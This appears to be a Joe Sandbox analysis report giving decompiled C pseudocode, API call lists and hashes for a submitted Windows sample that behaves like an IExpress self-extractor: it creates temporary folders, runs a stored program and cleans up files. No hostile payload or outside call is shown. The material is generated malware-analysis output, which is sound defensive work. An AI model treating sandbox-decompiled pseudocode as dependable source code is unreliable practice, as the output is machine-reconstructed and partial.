0x00eb23a5
0x00eb23ae
0x00eb23b3
0x00eb24cb
0x00eb24d2
0x00eb24d3
0x00eb24d4
0x00eb24df
0x00eb23c2
0x00eb23d1
0x00eb23db
0x00eb23e4
0x00eb23f6
0x00eb23fc
0x00eb2401
0x00000000
0x00000000
0x00000000
0x00000000
0x00eb2407
0x00eb2407
0x00eb2408
0x00eb2411
0x00eb241f
0x00eb247a
0x00eb2483
0x00eb2495
0x00eb24a3
0x00eb2421
0x00eb242f
0x00eb2453
0x00eb245d
0x00eb2466
0x00eb2472
0x00eb2472
0x00eb242f
0x00eb24af
0x00eb24b5
0x00eb24be
0x00eb24c5
0x00000000
0x00eb24c5

APIs

FindFirstFileA.KERNELBASE(?,00EB8A3A,00EB11F4,00EB8A3A,00000000,?,?), ref: 00EB23F6
lstrcmpA.KERNEL32(?,00EB11F8), ref: 00EB2427
lstrcmpA.KERNEL32(?,00EB11FC), ref: 00EB243B
SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00EB2495
DeleteFileA.KERNEL32(?), ref: 00EB24A3
FindNextFileA.KERNELBASE(00000000,00000010), ref: 00EB24AF
FindClose.KERNELBASE(00000000), ref: 00EB24BE
RemoveDirectoryA.KERNELBASE(00EB8A3A), ref: 00EB24C5

Memory Dump Source

Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_file.jbxd

Similarity

API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
String ID:
API String ID: 836429354-0
Opcode ID: 6422e9bc51a499dbe91e853f0605020e147720dcceaadab68c520a5db614f06a
Instruction ID: 99e4b30c3af6319bc127bbbea207cc234c1054e12fcde0f6563a5e4b6a8c87ee
Opcode Fuzzy Hash: 6422e9bc51a499dbe91e853f0605020e147720dcceaadab68c520a5db614f06a
Instruction Fuzzy Hash: 9331D3316047409FC721EB68CC89AEB73ECAFC4315F041A3DF695A2290EB74990DC792

Uniqueness

Uniqueness Score: -1.00%

Function 00EB3FEF Relevance: 10.6, APIs: 7, Instructions: 97
processsynchronizationwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E00EB3FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
				signed int _v8;
				char _v524;
				long _v528;
				struct _PROCESS_INFORMATION _v544;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t20;
				void* _t22;
				int _t25;
				intOrPtr* _t39;
				signed int _t44;
				void* _t49;
				signed int _t50;
				intOrPtr _t53;

				_t45 = __edx;
				_t20 =  *0xeb8004; // 0x92ae1240
				_v8 = _t20 ^ _t50;
				_t39 = __ecx;
				_t49 = 1;
				_t22 = 0;
				if(__ecx == 0) {
					L13:
					return E00EB6CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
				}
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
				if(_t25 == 0) {
					 *0xeb9124 = E00EB6285();
					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0);
					_t45 = 0x4c4;
					E00EB44B9(0, 0x4c4, _t39,  &_v524, 0x10, 0);
					L11:
					_t49 = 0;
					L12:
					_t22 = _t49;
					goto L13;
				}
				WaitForSingleObject(_v544.hProcess, 0xffffffff);
				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
				_t44 = _v528;
				_t53 =  *0xeb8a28; // 0x0
				if(_t53 == 0) {
					_t34 =  *0xeb9a2c; // 0x0
					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
						_t34 = _t44 & 0xff000000;
						if((_t44 & 0xff000000) == 0xaa000000) {
							 *0xeb9a2c = _t44;
						}
					}
				}
				E00EB411B(_t34, _t44);
				CloseHandle(_v544.hThread);
				CloseHandle(_v544);
				if(( *0xeb9a34 & 0x00000400) == 0 || _v528 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x00eb3fef
0x00eb3ffa
0x00eb4001
0x00eb4008
0x00eb400a
0x00eb400b
0x00eb4010
0x00eb410a
0x00eb411a
0x00eb411a
0x00eb401c
0x00eb401d
0x00eb401e
0x00eb401f
0x00eb4033
0x00eb403b
0x00eb40ca
0x00eb40e9
0x00eb40f8
0x00eb4101
0x00eb4106
0x00eb4106
0x00eb4108
0x00eb4108
0x00000000
0x00eb4108
0x00eb4049
0x00eb405c
0x00eb4062
0x00eb4068
0x00eb406e
0x00eb4070
0x00eb4077
0x00eb407f
0x00eb4089
0x00eb408b
0x00eb408b
0x00eb4089
0x00eb4077
0x00eb4091
0x00eb409c
0x00eb40a8
0x00eb40b8
0x00000000
0x00eb40c2
0x00000000
0x00eb40c2

APIs

CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?,?,?,00000000), ref: 00EB4033
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00EB4049
GetExitCodeProcess.KERNELBASE ref: 00EB405C
CloseHandle.KERNEL32(?), ref: 00EB409C
CloseHandle.KERNEL32(?), ref: 00EB40A8
GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00EB40DC
FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00EB40E9

Memory Dump Source

Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_file.jbxd

Similarity

API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
String ID:
API String ID: 3183975587-0
Opcode ID: e319795c6d4f3c029640b171624595927e6124d02a8e3f7367755cc3555b0de3
Instruction ID: 57c285b463f64cd06c286df88b0827d9e43b1c1f91094f7f3c2833864f616599
Opcode Fuzzy Hash: e319795c6d4f3c029640b171624595927e6124d02a8e3f7367755cc3555b0de3
Instruction Fuzzy Hash: 4D31A4B1641218AFEB619F6ADC49FEB77BCEB94704F101269F605F21A2C6304D89CF11

Uniqueness

Uniqueness Score: -1.00%

Function 00EB2BFB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00EB2BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t4;
				void* _t6;
				intOrPtr _t7;
				void* _t9;
				struct HINSTANCE__* _t12;
				intOrPtr* _t17;
				signed char _t19;
				intOrPtr* _t21;
				void* _t22;
				void* _t24;
				intOrPtr _t32;

				_t4 = GetVersion();
				if(_t4 >= 0 && _t4 >= 6) {
					_t12 = GetModuleHandleW(L"Kernel32.dll");
					if(_t12 != 0) {
						_t21 = GetProcAddress(_t12, "HeapSetInformation");
						if(_t21 != 0) {
							_t17 = _t21;
							 *0xeba288(0, 1, 0, 0);
							 *_t21();
							_t29 = _t24 - _t24;
							if(_t24 != _t24) {
								_t17 = 4;
								asm("int 0x29");
							}
						}
					}
				}
				_t20 = _a12;
				_t18 = _a4;
				 *0xeb9124 = 0;
				if(E00EB2CAA(_a4, _a12, _t29, _t17) != 0) {
					_t9 = E00EB2F1D(_t18, _t20); // executed
					_t22 = _t9; // executed
					E00EB52B6(0, _t18, _t21, _t22); // executed
					if(_t22 != 0) {
						_t32 =  *0xeb8a3a; // 0x0
						if(_t32 == 0) {
							_t19 =  *0xeb9a2c; // 0x0
							if((_t19 & 0x00000001) != 0) {
								E00EB1F90(_t19, _t21, _t22);
							}
						}
					}
				}
				_t6 =  *0xeb8588; // 0x0
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0xeb9124; // 0x0
				return _t7;
			}

0x00eb2c03
0x00eb2c0d
0x00eb2c18
0x00eb2c20
0x00eb2c2e
0x00eb2c32
0x00eb2c36
0x00eb2c3d
0x00eb2c43
0x00eb2c45
0x00eb2c47
0x00eb2c49
0x00eb2c4e
0x00eb2c4e
0x00eb2c47
0x00eb2c32
0x00eb2c20
0x00eb2c50
0x00eb2c54
0x00eb2c57
0x00eb2c64
0x00eb2c66
0x00eb2c6b
0x00eb2c6d
0x00eb2c74
0x00eb2c76
0x00eb2c7c
0x00eb2c7e
0x00eb2c87
0x00eb2c89
0x00eb2c89
0x00eb2c87
0x00eb2c7c
0x00eb2c74
0x00eb2c8e
0x00eb2c95
0x00eb2c98
0x00eb2c98
0x00eb2c9e
0x00eb2ca7

APIs

GetVersion.KERNEL32(?,00000002,00000000,?,00EB6BB0,00EB0000,00000000,00000002,0000000A), ref: 00EB2C03
GetModuleHandleW.KERNEL32(Kernel32.dll,?,00EB6BB0,00EB0000,00000000,00000002,0000000A), ref: 00EB2C18
GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00EB2C28
CloseHandle.KERNEL32(00000000,?,?,00EB6BB0,00EB0000,00000000,00000002,0000000A), ref: 00EB2C98

Strings

Kernel32.dll, xrefs: 00EB2C13
HeapSetInformation, xrefs: 00EB2C22

Memory Dump Source

Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_file.jbxd

Similarity

API ID: Handle$AddressCloseModuleProcVersion
String ID: HeapSetInformation$Kernel32.dll
API String ID: 62482547-3460614246
Opcode ID: 2168f5c29b54d737a1118da1adb604921343c257b9ccec8ad3497beed9624302
Instruction ID: 37ec6b702336b49544278f76a14dceadfcde092c10865cecd467d9c55b7f44fb
Opcode Fuzzy Hash: 2168f5c29b54d737a1118da1adb604921343c257b9ccec8ad3497beed9624302
Instruction Fuzzy Hash: B411E3312003016FCB216BB6AD49AEF7B999F44394B092229BB00F7261CA20DC06CA61

Uniqueness

Uniqueness Score: -1.00%

Function 00EB6F40 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00EB6F40() {

				SetUnhandledExceptionFilter(E00EB6EF0); // executed
				return 0;
			}

0x00eb6f45
0x00eb6f4d

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 00EB6F45

Memory Dump Source

Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_file.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 6b3f0175a0b54d3fd86098b4de997c26d2e231da1930efc798d291fca43e9c70
Instruction ID: 3f7fa9d2c1b1c3c112d5a8ddfe80c0225130408de4b55e7cd826d9d98aa4b3b9
Opcode Fuzzy Hash: 6b3f0175a0b54d3fd86098b4de997c26d2e231da1930efc798d291fca43e9c70
Instruction Fuzzy Hash: 719002E42622004BAA501B759D1946775915B4D602F856570E151E4494DB6491445612

Uniqueness

Uniqueness Score: -1.00%

Function 00EB55A0 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 248
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E00EB55A0(void* __eflags) {
				signed int _v8;
				char _v265;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				int _t32;
				int _t33;
				int _t35;
				signed int _t36;
				signed int _t38;
				int _t40;
				int _t44;
				long _t48;
				int _t49;
				int _t50;
				signed int _t53;
				int _t54;
				int _t59;
				char _t60;
				int _t65;
				char _t66;
				int _t67;
				int _t68;
				int _t69;
				int _t70;
				int _t71;
				struct _SECURITY_ATTRIBUTES* _t72;
				int _t73;
				CHAR* _t82;
				CHAR* _t88;
				void* _t103;
				signed int _t110;

				_t28 =  *0xeb8004; // 0x92ae1240
				_v8 = _t28 ^ _t110;
				_t2 = E00EB468F("RUNPROGRAM", 0, 0) + 1; // 0x1
				_t109 = LocalAlloc(0x40, _t2);
				if(_t109 != 0) {
					_t82 = "RUNPROGRAM";
					_t32 = E00EB468F(_t82, _t109, 1);
					__eflags = _t32;
					if(_t32 != 0) {
						_t33 = lstrcmpA(_t109, "<None>");
						__eflags = _t33;
						if(_t33 == 0) {
							 *0xeb9a30 = 1;
						}
						LocalFree(_t109);
						_t35 =  *0xeb8b3e; // 0x0
						__eflags = _t35;
						if(_t35 == 0) {
							__eflags =  *0xeb8a24; // 0x0
							if(__eflags != 0) {
								L46:
								_t101 = 0x7d2;
								_t36 = E00EB6517(_t82, 0x7d2, 0, E00EB3210, 0, 0);
								asm("sbb eax, eax");
								_t38 =  ~( ~_t36);
							} else {
								__eflags =  *0xeb9a30; // 0x0
								if(__eflags != 0) {
									goto L46;
								} else {
									_t109 = 0xeb91e4;
									_t40 = GetTempPathA(0x104, 0xeb91e4);
									__eflags = _t40;
									if(_t40 == 0) {
										L19:
										_push(_t82);
										E00EB1781( &_v268, 0x104, _t82, "A:\\");
										__eflags = _v268 - 0x5a;
										if(_v268 <= 0x5a) {
											do {
												_t109 = GetDriveTypeA( &_v268);
												__eflags = _t109 - 6;
												if(_t109 == 6) {
													L22:
													_t48 = GetFileAttributesA( &_v268);
													__eflags = _t48 - 0xffffffff;
													if(_t48 != 0xffffffff) {
														goto L30;
													} else {
														goto L23;
													}
												} else {
													__eflags = _t109 - 3;
													if(_t109 != 3) {
														L23:
														__eflags = _t109 - 2;
														if(_t109 != 2) {
															L28:
															_t66 = _v268;
															goto L29;
														} else {
															_t66 = _v268;
															__eflags = _t66 - 0x41;
															if(_t66 == 0x41) {
																L29:
																_t60 = _t66 + 1;
																_v268 = _t60;
																goto L42;
															} else {
																__eflags = _t66 - 0x42;
																if(_t66 == 0x42) {
																	goto L29;
																} else {
																	_t68 = E00EB6952( &_v268);
																	__eflags = _t68;
																	if(_t68 == 0) {
																		goto L28;
																	} else {
																		__eflags = _t68 - 0x19000;
																		if(_t68 >= 0x19000) {
																			L30:
																			_push(0);
																			_t103 = 3;
																			_t49 = E00EB597D( &_v268, _t103, 1);
																			__eflags = _t49;
																			if(_t49 != 0) {
																				L33:
																				_t50 = E00EB2630(0,  &_v268, 1);
																				__eflags = _t50;
																				if(_t50 != 0) {
																					GetWindowsDirectoryA( &_v268, 0x104);
																				}
																				_t88 =  &_v268;
																				E00EB658A(_t88, 0x104, "msdownld.tmp");
																				_t53 = GetFileAttributesA( &_v268);
																				__eflags = _t53 - 0xffffffff;
																				if(_t53 != 0xffffffff) {
																					_t54 = _t53 & 0x00000010;
																					__eflags = _t54;
																				} else {
																					_t54 = CreateDirectoryA( &_v268, 0);
																				}
																				__eflags = _t54;
																				if(_t54 != 0) {
																					SetFileAttributesA( &_v268, 2);
																					_push(_t88);
																					_t109 = 0xeb91e4;
																					E00EB1781(0xeb91e4, 0x104, _t88,  &_v268);
																					_t101 = 1;
																					_t59 = E00EB5467(0xeb91e4, 1, 0);
																					__eflags = _t59;
																					if(_t59 != 0) {
																						goto L45;
																					} else {
																						_t60 = _v268;
																						goto L42;
																					}
																				} else {
																					_t60 = _v268 + 1;
																					_v265 = 0;
																					_v268 = _t60;
																					goto L42;
																				}
																			} else {
																				_t65 = E00EB2630(0,  &_v268, 1);
																				__eflags = _t65;
																				if(_t65 != 0) {
																					goto L28;
																				} else {
																					_t67 = E00EB597D( &_v268, 1, 1, 0);
																					__eflags = _t67;
																					if(_t67 == 0) {
																						goto L28;
																					} else {
																						goto L33;
																					}
																				}
																			}
																		} else {
																			goto L28;
																		}
																	}
																}
															}
														}
													} else {
														goto L22;
													}
												}
												goto L47;
												L42:
												__eflags = _t60 - 0x5a;
											} while (_t60 <= 0x5a);
										}
										goto L43;
									} else {
										_t101 = 1;
										_t69 = E00EB5467(0xeb91e4, 1, 3); // executed
										__eflags = _t69;
										if(_t69 != 0) {
											goto L45;
										} else {
											_t82 = 0xeb91e4;
											_t70 = E00EB2630(0, 0xeb91e4, 1);
											__eflags = _t70;
											if(_t70 != 0) {
												goto L19;
											} else {
												_t101 = 1;
												_t82 = 0xeb91e4;
												_t71 = E00EB5467(0xeb91e4, 1, 1);
												__eflags = _t71;
												if(_t71 != 0) {
													goto L45;
												} else {
													do {
														goto L19;
														L43:
														GetWindowsDirectoryA( &_v268, 0x104);
														_push(4);
														_t101 = 3;
														_t82 =  &_v268;
														_t44 = E00EB597D(_t82, _t101, 1);
														__eflags = _t44;
													} while (_t44 != 0);
													goto L2;
												}
											}
										}
									}
								}
							}
						} else {
							__eflags = _t35 - 0x5c;
							if(_t35 != 0x5c) {
								L10:
								_t72 = 1;
							} else {
								__eflags =  *0xeb8b3f - _t35; // 0x0
								_t72 = 0;
								if(__eflags != 0) {
									goto L10;
								}
							}
							_t101 = 0;
							_t73 = E00EB5467(0xeb8b3e, 0, _t72);
							__eflags = _t73;
							if(_t73 != 0) {
								L45:
								_t38 = 1;
							} else {
								_t101 = 0x4be;
								E00EB44B9(0, 0x4be, 0, 0, 0x10, 0);
								goto L2;
							}
						}
					} else {
						_t101 = 0x4b1;
						E00EB44B9(0, 0x4b1, 0, 0, 0x10, 0);
						LocalFree(_t109);
						 *0xeb9124 = 0x80070714;
						goto L2;
					}
				} else {
					_t101 = 0x4b5;
					E00EB44B9(0, 0x4b5, 0, 0, 0x10, 0);
					 *0xeb9124 = E00EB6285();
					L2:
					_t38 = 0;
				}
				L47:
				return E00EB6CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
			}

0x00eb55ab
0x00eb55b2
0x00eb55c9
0x00eb55d5
0x00eb55d9
0x00eb5600
0x00eb5605
0x00eb560a
0x00eb560c
0x00eb5638
0x00eb5641
0x00eb5643
0x00eb5645
0x00eb5645
0x00eb564c
0x00eb5652
0x00eb5657
0x00eb5659
0x00eb5696
0x00eb569c
0x00eb589f
0x00eb58a7
0x00eb58ac
0x00eb58b3
0x00eb58b5
0x00eb56a2
0x00eb56a2
0x00eb56a8
0x00000000
0x00eb56ae
0x00eb56ae
0x00eb56b9
0x00eb56bf
0x00eb56c1
0x00eb56f3
0x00eb56f3
0x00eb5705
0x00eb570a
0x00eb5711
0x00eb5717
0x00eb5724
0x00eb5726
0x00eb5729
0x00eb5730
0x00eb5737
0x00eb573d
0x00eb5740
0x00000000
0x00000000
0x00000000
0x00000000
0x00eb572b
0x00eb572b
0x00eb572e
0x00eb5742
0x00eb5742
0x00eb5745
0x00eb576b
0x00eb576b
0x00000000
0x00eb5747
0x00eb5747
0x00eb574d
0x00eb574f
0x00eb5771
0x00eb5771
0x00eb5773
0x00000000
0x00eb5751
0x00eb5751
0x00eb5753
0x00000000
0x00eb5755
0x00eb575b
0x00eb5760
0x00eb5762
0x00000000
0x00eb5764
0x00eb5764
0x00eb5769
0x00eb577e
0x00eb577e
0x00eb5781
0x00eb5788
0x00eb578d
0x00eb578f
0x00eb57b2
0x00eb57b8
0x00eb57bd
0x00eb57bf
0x00eb57cd
0x00eb57cd
0x00eb57dd
0x00eb57e3
0x00eb57ef
0x00eb57f5
0x00eb57f8
0x00eb580a
0x00eb580a
0x00eb57fa
0x00eb5802
0x00eb5802
0x00eb580d
0x00eb580f
0x00eb5830
0x00eb5836
0x00eb583d
0x00eb584b
0x00eb5851
0x00eb5855
0x00eb585a
0x00eb585c
0x00000000
0x00eb585e
0x00eb585e
0x00000000
0x00eb585e
0x00eb5811
0x00eb5817
0x00eb5819
0x00eb581f
0x00000000
0x00eb581f
0x00eb5791
0x00eb5797
0x00eb579c
0x00eb579e
0x00000000
0x00eb57a0
0x00eb57a9
0x00eb57ae
0x00eb57b0
0x00000000
0x00000000
0x00000000
0x00000000
0x00eb57b0
0x00eb579e
0x00000000
0x00000000
0x00000000
0x00eb5769
0x00eb5762
0x00eb5753
0x00eb574f
0x00000000
0x00000000
0x00000000
0x00eb572e
0x00000000
0x00eb5864
0x00eb5864
0x00eb5864
0x00eb5717
0x00000000
0x00eb56c3
0x00eb56c5
0x00eb56c9
0x00eb56ce
0x00eb56d0
0x00000000
0x00eb56d6
0x00eb56d6
0x00eb56d8
0x00eb56dd
0x00eb56df
0x00000000
0x00eb56e1
0x00eb56e2
0x00eb56e4
0x00eb56e6
0x00eb56eb
0x00eb56ed
0x00000000
0x00eb56f3
0x00eb56f3
0x00000000
0x00eb586c
0x00eb5878
0x00eb587e
0x00eb5882
0x00eb5883
0x00eb5889
0x00eb588e
0x00eb588e
0x00000000
0x00eb5896
0x00eb56ed
0x00eb56df
0x00eb56d0
0x00eb56c1
0x00eb56a8
0x00eb565b
0x00eb565b
0x00eb565d
0x00eb5669
0x00eb5669
0x00eb565f
0x00eb565f
0x00eb5665
0x00eb5667
0x00000000
0x00000000
0x00eb5667
0x00eb566c
0x00eb5673
0x00eb5678
0x00eb567a
0x00eb589b
0x00eb589b
0x00eb5680
0x00eb5685
0x00eb568c
0x00000000
0x00eb568c
0x00eb567a
0x00eb560e
0x00eb5613
0x00eb561a
0x00eb5620
0x00eb5626
0x00000000
0x00eb5626
0x00eb55db
0x00eb55e0
0x00eb55e7
0x00eb55f1
0x00eb55f6
0x00eb55f6
0x00eb55f6
0x00eb58b7
0x00eb58c7

APIs

Part of subcall function 00EB468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00EB46A0
Part of subcall function 00EB468F: SizeofResource.KERNEL32(00000000,00000000,?,00EB2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00EB46A9
Part of subcall function 00EB468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00EB46C3
Part of subcall function 00EB468F: LoadResource.KERNEL32(00000000,00000000,?,00EB2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00EB46CC
Part of subcall function 00EB468F: LockResource.KERNEL32(00000000,?,00EB2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00EB46D3
Part of subcall function 00EB468F: memcpy_s.MSVCRT ref: 00EB46E5
Part of subcall function 00EB468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00EB46EF

LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 00EB55CF
lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00EB5638
LocalFree.KERNEL32(00000000), ref: 00EB564C
LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00EB5620

Part of subcall function 00EB44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00EB4518
Part of subcall function 00EB44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00EB4554

Part of subcall function 00EB6285: GetLastError.KERNEL32(00EB5BBC), ref: 00EB6285

GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00EB56B9
GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 00EB571E
GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00EB5737
GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 00EB57CD
GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 00EB57EF
CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00EB5802

Part of subcall function 00EB2630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00EB2654

SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00EB5830

Part of subcall function 00EB6517: FindResourceA.KERNEL32(00EB0000,000007D6,00000005), ref: 00EB652A
Part of subcall function 00EB6517: LoadResource.KERNEL32(00EB0000,00000000,?,?,00EB2EE8,00000000,00EB19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00EB6538
Part of subcall function 00EB6517: DialogBoxIndirectParamA.USER32(00EB0000,00000000,00000547,00EB19E0,00000000), ref: 00EB6557
Part of subcall function 00EB6517: FreeResource.KERNEL32(00000000,?,?,00EB2EE8,00000000,00EB19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00EB6560

GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00EB5878

Part of subcall function 00EB597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00EB59A8
Part of subcall function 00EB597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 00EB59AF

Strings

A:\, xrefs: 00EB56F4
C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00EB56AE, 00EB56B3, 00EB583D
Z, xrefs: 00EB570A
msdownld.tmp, xrefs: 00EB57D3
RUNPROGRAM, xrefs: 00EB55BD, 00EB5600
<None>, xrefs: 00EB5632

Memory Dump Source

Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_file.jbxd

Similarity

API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
API String ID: 2436801531-1370313076
Opcode ID: bf19e293574d3ff6a474db95cac623bdc69ce65842424c57f027c5edc970e955
Instruction ID: 9ee8d4e8d7dd4f83530db6b089ce363994b978cb48cef3c861ff1ac01284e357
Opcode Fuzzy Hash: bf19e293574d3ff6a474db95cac623bdc69ce65842424c57f027c5edc970e955
Instruction Fuzzy Hash: AE816AB2B04A149BDB24AB759D81BFB73AD9F60304F0421B6F6C6F2191EF708DC58A50

Uniqueness

Uniqueness Score: -1.00%

Function 00EB53A1 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 71
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E00EB53A1(CHAR* __ecx, CHAR* __edx) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t5;
				long _t13;
				int _t14;
				CHAR* _t20;
				int _t29;
				int _t30;
				CHAR* _t32;
				signed int _t33;
				void* _t34;

				_t5 =  *0xeb8004; // 0x92ae1240
				_v8 = _t5 ^ _t33;
				_t32 = __edx;
				_t20 = __ecx;
				_t29 = 0;
				while(1) {
					E00EB171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
					_t34 = _t34 + 0x10;
					_t29 = _t29 + 1;
					E00EB1680(_t32, 0x104, _t20);
					E00EB658A(_t32, 0x104,  &_v268); // executed
					RemoveDirectoryA(_t32); // executed
					_t13 = GetFileAttributesA(_t32); // executed
					if(_t13 == 0xffffffff) {
						break;
					}
					if(_t29 < 0x190) {
						continue;
					}
					L3:
					_t30 = 0;
					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
						_t30 = 1;
						DeleteFileA(_t32);
						CreateDirectoryA(_t32, 0);
					}
					L5:
					return E00EB6CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
				}
				_t14 = CreateDirectoryA(_t32, 0); // executed
				if(_t14 == 0) {
					goto L3;
				}
				_t30 = 1;
				 *0xeb8a20 = 1;
				goto L5;
			}

0x00eb53ac
0x00eb53b3
0x00eb53b9
0x00eb53bb
0x00eb53bd
0x00eb53bf
0x00eb53d1
0x00eb53d6
0x00eb53e0
0x00eb53e2
0x00eb53f5
0x00eb53fb
0x00eb5402
0x00eb540b
0x00000000
0x00000000
0x00eb5413
0x00000000
0x00000000
0x00eb5415
0x00eb5416
0x00eb5427
0x00eb542a
